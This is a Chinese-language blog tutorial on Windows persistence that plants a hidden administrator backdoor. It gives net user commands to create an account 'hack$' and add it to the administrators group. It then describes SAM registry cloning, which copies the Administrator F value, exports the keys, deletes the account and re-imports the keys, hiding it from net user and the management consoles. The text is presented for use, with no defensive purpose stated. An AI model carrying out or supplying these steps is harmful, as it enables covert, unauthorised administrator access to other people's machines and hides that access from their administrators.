隐藏用户维持
隐藏账户,顾名思义就是计算机不看不到的用户(不是不存在用户只是用一般的查看方式看不到)
$符号隐藏用户
$符号隐藏用户就是在一个用户名后面添加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维 持
1、我们平时查看一个操作系统的有几个用户的命令如下
net user //查看电脑中的用户命令
可以看到当前的机器上存在两个用户Administrator和Guest
2、接下来我们创建一个简单的隐藏用户,如下命令
net user hack$ Admin@123 /add ##创建一个hack$ 账户密码为Admin@123
net localgroup administrators hack$ /add ##把hack$账户添加到管理员组
net user 是添加用户命令,hack$为隐藏用户的用户名,Admin@123是密码
3、接下来使用net user 命令查看电脑中的用户,可以发现并没有hack$这个用户
4、通过计算机管理–本地账户合组—用户–可以看到
通过【控制面板】->【用户账户】–>【管理其他账户】中是可以看到该用户。
注册表克隆用户隐藏
因为$用户可以看到,在上一步的基础上我们打开注册表,在注册表操作进行用户隐藏
提示:该操作是建立在上面$符号隐藏用户的基础上的
1、打开注册表(命令regedit)
找到 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\ 路径下
右键属性,给当前账号分配一下权限
2、导出注册表文件(之前创建的hack$用户),会生成一个reg文件
3、 将 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 中的 administrator 中的F键值复制
4、将复制的值,粘贴到hack$对应的F值中
5、将hack$ 对应的的数据导出来,保存为hack$1
6、通过net命令删除hack$用户
命令:net user hack$ /delete
7、此时hack$已经被删除,但是我们有生成两个reg文件,对两个文件进行运行
8、此时使用命令或者【账户管理】或者【计算机管理】都没有hack$用户
9、但是使用注册表和wmic还是可以查看到此用户的
© 版权声明
本站所有内容(包括但不限于文字、图片、视频等)均受到版权法保护,归作者所有,未经授权不得转载、复制或用于其他任何商业目的。
转载请注明出处,并保留原文链接。对于未经授权的使用,我们将保留追究法律责任的权利。
THE END
暂无评论内容